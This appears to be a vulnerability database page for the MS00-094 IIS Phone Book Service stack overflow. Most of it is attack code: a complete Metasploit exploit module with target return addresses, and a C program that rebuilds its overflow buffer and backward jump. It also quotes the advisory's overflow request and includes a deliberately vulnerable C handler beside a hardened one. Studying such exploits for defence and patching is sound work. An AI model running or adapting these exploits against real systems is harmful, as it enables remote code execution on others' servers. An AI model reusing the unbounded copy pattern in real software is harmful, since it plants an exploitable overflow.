Metrics
Metrics | Score | Severity | CVSS Vector | Source
V2 | 10 | | AV:N/AC:L/Au:N/C:C/I:C/A:C | [email protected]
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0% to 100%). The higher the score, the greater the probability that the vulnerability will be exploited.
EPSS Percentile
The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs. The percentile is therefore the figure to use when comparing the EPSS score of one CVE with that of others.
Exploit information
Exploit Database EDB-ID : 16357
Publication date : 2010-04-29 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: ms00_094_pbserver.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft IIS Phone Book Service Overflow',
      'Description'    => %q{
        This is an exploit for the Phone Book Service /pbserver/pbserver.dll
        described in MS00-094. By sending an overly long URL argument
        for phone book updates, it is possible to overwrite the stack. This
        module has only been tested against Windows 2000 SP1.
      },
      'Author'         => [ 'patrick' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9179 $',
      'References'     =>
        [
          [ 'CVE', '2000-1089' ],
          [ 'OSVDB', '463' ],
          [ 'BID', '2048' ],
          [ 'MSB', 'MS00-094' ],
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          # 896 payload bytes sit in front of the return address in the request built below
          'Space'           => 896,
          # NUL, CR/LF and space would end the request line; % & = ? are query-string metacharacters
          'BadChars'        => "\x00\x0a\x0d\x20%&=?",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows 2000 SP1', { 'Ret' => 0x77e8898b }], # jmp esp kernel32.dll
          ['Windows 2000 SP0', { 'Ret' => 0x77ea162b }], # call esp kernel32.dll
          ['Windows NT SP6',   { 'Ret' => 0x77f32836 }], # jmp esp kernel32.dll
        ],
      'DisclosureDate' => 'Dec 04 2000',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('URL', [ true, "The path to pbserver.dll", "/pbserver/pbserver.dll" ]),
      ], self.class)
  end

  # Presence check only: an HTTP 400 for the bare ISAPI path shows that
  # pbserver.dll is installed and answering. It does not distinguish a
  # patched build from an unpatched one.
  def check
    print_status("Requesting the vulnerable ISAPI path...")
    res = send_request_raw({
      'uri' => datastore['URL']
    }, 5)
    if (res and res.code == 400)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  # Bytes after "pb=": [payload, 896][ret, 4][8 NOPs][jmp rel32 -912].
  # The overwritten return address goes to jmp/call esp, which lands on the
  # NOP bytes that follow it; the backward jmp then returns execution to the
  # start of the payload region.
  def exploit
    print_status("Sending overflow...")
    res = send_request_raw({
      'uri' => datastore['URL'] + '?&&&&&&pb=' + payload.encoded + [target['Ret']].pack('V') + make_nops(8) + Rex::Arch::X86.jmp(-912)
    }, 5)
    handler
  end
end
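To make the module's constants concrete, here is an added C example (it is not part of the Metasploit module or of this page) that builds the same byte layout the exploit method appends after "pb=" and checks the arithmetic that ties Space, the return address, make_nops(8) and jmp(-912) together. The 896-byte payload region is modelled as NOPs, since Metasploit pads payload.encoded to Space with a NOP sled ahead of the shellcode; the return address is the module's Windows 2000 SP1 target, and the URI prefix is the module's default URL plus its query prefix.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constants taken from the module above. */
#define PAYLOAD_SPACE 896          /* 'Space' */
#define NOP_COUNT     8            /* make_nops(8) */
#define JMP_REL       (-912)       /* Rex::Arch::X86.jmp(-912) */
#define RET_W2K_SP1   0x77e8898bu  /* jmp esp in kernel32.dll, target 0 */
#define URI_PREFIX    "/pbserver/pbserver.dll?&&&&&&pb="

/* Offsets relative to the first byte after "pb=". */
enum {
    OFF_PAYLOAD = 0,
    OFF_RET     = OFF_PAYLOAD + PAYLOAD_SPACE,   /* 896 */
    OFF_NOPS    = OFF_RET + 4,                   /* 900 */
    OFF_JMP     = OFF_NOPS + NOP_COUNT,          /* 908 */
    PB_LEN      = OFF_JMP + 5                    /* 913 */
};

/* 'BadChars' from the module: NUL, CR/LF, space and query-string metacharacters. */
static const unsigned char BADCHARS[] = { 0x00, 0x0a, 0x0d, 0x20, '%', '&', '=', '?' };

unsigned char exploit_pb[PB_LEN];

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

static int32_t get_le32(const unsigned char *p)
{
    return (int32_t)((uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24);
}

/* Build the bytes the module appends after "pb=". The payload region is
 * modelled as NOPs (an assumption: the real region is a NOP sled followed
 * by the encoded shellcode). */
size_t build_pb(unsigned char *out, uint32_t ret)
{
    memset(out + OFF_PAYLOAD, 0x90, PAYLOAD_SPACE);
    put_le32(out + OFF_RET, ret);                 /* [ret].pack('V') */
    memset(out + OFF_NOPS, 0x90, NOP_COUNT);      /* make_nops(8) */
    out[OFF_JMP] = 0xe9;                          /* jmp rel32 */
    put_le32(out + OFF_JMP + 1, (uint32_t)JMP_REL);
    return PB_LEN;
}

/* Offset a jmp rel32 at jmp_off transfers to; rel32 is relative to the end of the 5-byte instruction. */
long jmp_landing(const unsigned char *buf, size_t jmp_off)
{
    return (long)jmp_off + 5 + get_le32(buf + jmp_off + 1);
}

/* Follow control flow from the byte ESP points at once the overwritten
 * return address has been popped: slide over NOPs, then take one jmp rel32. */
long trace_from_esp(const unsigned char *buf, size_t len, size_t esp_off)
{
    size_t pc = esp_off;
    while (pc < len && buf[pc] == 0x90) pc++;
    if (pc + 5 <= len && buf[pc] == 0xe9) return jmp_landing(buf, pc);
    return (long)pc;
}

/* 1 if any byte would be mangled in transit according to the module's BadChars. */
int has_badchar(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < sizeof BADCHARS; j++)
            if (buf[i] == BADCHARS[j]) return 1;
    return 0;
}

/* Length of the whole request URI, for comparison with the 1024-byte limit the advisory below describes. */
size_t uri_length(void)
{
    return strlen(URI_PREFIX) + PB_LEN;
}

int main(void)
{
    build_pb(exploit_pb, RET_W2K_SP1);
    printf("pb value: %d bytes, URI: %zu bytes\n", PB_LEN, uri_length());
    printf("ret at %d, ESP lands at %d, jmp at %d -> offset %ld\n",
           OFF_RET, OFF_NOPS, OFF_JMP, trace_from_esp(exploit_pb, PB_LEN, OFF_NOPS));
    printf("bad chars present: %s\n", has_badchar(exploit_pb, PB_LEN) ? "yes" : "no");
    return 0;
}
```

The numbers line up with the advisory that follows: the pb value is 913 bytes, under the "less than 980 chars" the original report needed, and the whole URI is 945 bytes, under the DLL's 1024-byte total check. The jmp at offset 908 lands at offset 1, i.e. inside the sled at the head of the payload region, and neither the return address bytes (8b 89 e8 77) nor the jmp encoding (e9 70 fc ff ff) contain a bad character.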
Exploit Database EDB-ID : 20460
Publication date : 2000-12-03 23h00 +00:00
Author : Alberto Solino
EDB Verified : Yes
source: https://www.securityfocus.com/bid/2048/info
The Phone Book Service is an optional component that ships with the NT 4 Option Pack and Windows 2000. It is not installed by default.
A buffer overflow vulnerability was discovered in the URL processing routines of the Phone Book Service requests on IIS 4 and IIS 5. If exploited, this vulnerability allows an attacker to execute arbitrary code and obtain a remote command shell with those privileges of the IUSR_machinename account (IIS 4) or the IWAM_machinename account (IIS 5).
The Phone Book server handles requests through Internet Information Services 5.0 at URIs such as http://hostname/pbserver/
According to Microsoft's documentation the service is exposed by a DLL (PBSERVER.DLL) that accepts requests of the following format:
http://hostname/pbserver/pbserver.dll?osarch=&ostype=&osver=&cmver=&lcid=&pbver=&pb=<STRING=db name>
The DLL checks the total length to ensure that the request does not exceed 1024 bytes; however, it is possible to overflow a fixed-length local variable in the DLL by sending a request of the following form:
GET /pbserver/pbserver.dll?&&&&&&pb=AAAAAA... (less than 980 chars) HTTP/1.0\n\n
The result is an exception reported in the Event log with source WAM like the following:
The HTTP server encountered an unhandled exception while processing the ISAPI Application '
+ 0x41414143
+ 0x41414139
pbserver!HttpExtensionProc + 0x1C
wam!DllGetClassObject + 0x808
RPCRT4!NdrServerInitialize + 0x4DB
RPCRT4!NdrStubCall2 + 0x586
RPCRT4!CStdStubBuffer_Invoke + 0xC1
ole32!StgGetIFillLockBytesOnFile + 0x116EC
ole32!StgGetIFillLockBytesOnFile + 0x12415
ole32!DcomChannelSetHResult + 0xDF0
ole32!DcomChannelSetHResult + 0xD35
ole32!StgGetIFillLockBytesOnFile + 0x122AD
ole32!StgGetIFillLockBytesOnFile + 0x1210A
ole32!StgGetIFillLockBytesOnFile + 0x11E22
RPCRT4!NdrServerInitialize + 0x745
RPCRT4!NdrServerInitialize + 0x652
RPCRT4!NdrServerInitialize + 0x578
RPCRT4!RpcSmDestroyClientContext + 0x9E
RPCRT4!NdrConformantArrayFree + 0x8A5
RPCRT4!NdrConformantArrayFree + 0x3FC
RPCRT4!RpcBindingSetOption + 0x395
RPCRT4!RpcBindingSetOption + 0x18E
RPCRT4!RpcBindingSetOption + 0x4F8
KERNEL32!CreateFileA + 0x11B
For additional information specific to this message please visit the Microsoft Online Support site located at: http://www.microsoft.com/contentredirect.asp.
By sending a carefully crafted HTTP request, an attacker can bypass the total length check and overflow a local variable in PBSERVER.DLL, allowing the execution of arbitrary code as user GUEST on the vulnerable machine.
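The bypass the advisory describes, as an added C example that is neither the advisory's nor the DLL's code: a handler that bounds the whole request at 1024 bytes but copies the pb field into a fixed stack buffer unchecked, beside a hardened version that bounds each field by its destination. The 896-byte size of the local buffer is an assumption (the page does not give the real size; the Metasploit module above places its return address at that offset), the parser treats the six leading '&' as six empty fields, and the request is constructed here.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_REQUEST 1024   /* the total-length check the advisory describes */
/* Size of the fixed local variable is not given on the page; 896 is assumed
 * because that is where the Metasploit module places its return address. */
#define PB_LOCAL    896

char g_query[MAX_REQUEST + 64];   /* constructed test input lives here */
char g_dbname[PB_LOCAL];

/* Locate the pb= field in a query of &-separated fields. Returns a pointer
 * to the value and its length, or NULL when no pb= field is present. */
static const char *find_pb(const char *query, size_t *vlen)
{
    const char *p = query;
    for (;;) {
        const char *end = strchr(p, '&');
        size_t flen = end ? (size_t)(end - p) : strlen(p);
        if (flen >= 3 && memcmp(p, "pb=", 3) == 0) {
            *vlen = flen - 3;
            return p + 3;
        }
        if (!end) return NULL;
        p = end + 1;
    }
}

/* The pattern the advisory describes: the whole request is bounded, the
 * copy of one field into a fixed stack buffer is not. Never call this with
 * a value of PB_LOCAL bytes or more: it writes past dbname. */
int vulnerable_handler(const char *query)
{
    char dbname[PB_LOCAL];
    size_t vlen;
    const char *v;

    if (strlen(query) >= MAX_REQUEST) return 0;   /* the only check performed */
    v = find_pb(query, &vlen);
    if (!v) return 0;
    memcpy(dbname, v, vlen);                      /* vlen may exceed sizeof dbname */
    dbname[vlen] = '\0';
    return dbname[0] != '\0';
}

/* How many bytes the pb value (plus terminator) would spill past a
 * PB_LOCAL-byte buffer once the total check has passed; 0 means it fits.
 * Pure arithmetic, safe to call on any input. */
size_t vulnerable_overflow(const char *query)
{
    size_t vlen;
    if (strlen(query) >= MAX_REQUEST || !find_pb(query, &vlen)) return 0;
    return vlen + 1 > PB_LOCAL ? vlen + 1 - PB_LOCAL : 0;
}

/* Hardened form: bound every field by its destination, not just the total. */
int hardened_handler(const char *query, char *dst, size_t dstlen)
{
    size_t vlen;
    const char *v;

    if (strlen(query) >= MAX_REQUEST) return 0;
    v = find_pb(query, &vlen);
    if (!v || vlen + 1 > dstlen) return 0;        /* reject before copying */
    memcpy(dst, v, vlen);
    dst[vlen] = '\0';
    return 1;
}

/* Build the advisory's query "&&&&&&pb=AAAA..." with n_a 'A's into g_query.
 * Returns its length, or 0 if it would not fit the scratch buffer. */
size_t build_advisory_query(size_t n_a)
{
    static const char prefix[] = "&&&&&&pb=";
    size_t plen = sizeof prefix - 1;
    if (plen + n_a + 1 > sizeof g_query) return 0;
    memcpy(g_query, prefix, plen);
    memset(g_query + plen, 'A', n_a);
    g_query[plen + n_a] = '\0';
    return plen + n_a;
}

int main(void)
{
    size_t len = build_advisory_query(979);
    printf("query %zu bytes: total check %s, spills %zu bytes past a %d-byte buffer, hardened handler %s\n",
           len, strlen(g_query) < MAX_REQUEST ? "passes" : "fails",
           vulnerable_overflow(g_query), PB_LOCAL,
           hardened_handler(g_query, g_dbname, sizeof g_dbname) ? "accepts" : "rejects");
    return 0;
}
```

With 979 'A's the query is 988 bytes, so the 1024-byte total check passes while the value spills 84 bytes past the assumed buffer; the hardened handler rejects the same request because it compares the field against its own destination. A value over 1024 bytes is stopped by the total check in both versions, which is why a length check on the whole request alone gave a false sense of safety here.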
Products Mentioned
Configuration 0
Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_nt >> Version 4.0
References